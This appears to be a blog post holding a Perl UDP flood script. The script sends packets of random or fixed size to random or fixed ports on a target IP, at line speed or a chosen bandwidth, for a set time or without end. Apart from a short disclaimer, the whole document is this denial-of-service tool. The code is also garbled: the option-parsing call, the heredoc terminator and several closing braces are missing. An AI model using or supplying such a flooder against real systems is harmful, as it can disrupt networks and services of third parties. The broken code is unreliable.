'UDP'에 해당되는 글 1건

# udp flood.

use Socket;
use strict;
use Getopt::Long;
use Time::HiRes qw( usleep gettimeofday ) ;

our $port = 0;
our $size = 0;
our $time = 0;
our $bw   = 0;
our $help = 0;
our $delay= 0;

	"port=i" => \$port,		# UDP port to use, numeric, 0=random
	"size=i" => \$size,		# packet size, number, 0=random
	"bandwidth=i" => \$bw,		# bandwidth to consume
	"time=i" => \$time,		# time to run
	"delay=f"=> \$delay,		# inter-packet delay
	"help|?" => \$help);		# help

my ($ip) = @ARGV;

if ($help || !$ip) {
  print <<'EOL';
flood.pl --port=dst-port --size=pkt-size --time=secs
         --bandwidth=kbps --delay=msec ip-address

  * random destination UDP ports are used unless --port is specified
  * random-sized packets are sent unless --size or --bandwidth is specified
  * flood is continuous unless --time is specified
  * flood is sent at line speed unless --bandwidth or --delay is specified

Usage guidelines:
  --size parameter is ignored if both the --bandwidth and the --delay 
    parameters are specified.

  Packet size is set to 256 bytes if the --bandwidth parameter is used 
    without the --size parameter

  The specified packet size is the size of the IP datagram (including IP and
  UDP headers). Interface packet sizes might vary due to layer-2 encapsulation.

Warnings and Disclaimers:
  Flooding third-party hosts or networks is commonly considered a criminal activity.
  Flooding your own hosts or networks is usually a bad idea
  Higher-performace flooding solutions should be used for stress/performance tests
  Use primarily in lab environments for QoS tests

if ($bw && $delay) {
  print "WARNING: computed packet size overwrites the --size parameter ignored\n";
  $size = int($bw * $delay / 8);
} elsif ($bw) {
  $delay = (8 * $size) / $bw;

$size = 256 if $bw && !$size;

($bw = int($size / $delay * 8)) if ($delay && $size);

my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 1000000);
socket(flood, PF_INET, SOCK_DGRAM, 17);

print "Flooding $ip " . ($port ? $port : "random") . " port with " . 
  ($size ? "$size-byte" : "random size") . " packets" . ($time ? " for $time seconds" : "") . "\n";
print "Interpacket delay $delay msec\n" if $delay;
print "total IP bandwidth $bw kbps\n" if $bw;
print "Break with Ctrl-C\n" unless $time;

die "Invalid packet size requested: $size\n" if $size && ($size < 64 || $size > 1500);
$size -= 28 if $size;
for (;time() <= $endtime;) {
  $psize = $size ? $size : int(rand(1024-64)+64) ;
  $pport = $port ? $port : int(rand(65500))+1;

  send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));
  usleep(1000 * $delay) if $delay;

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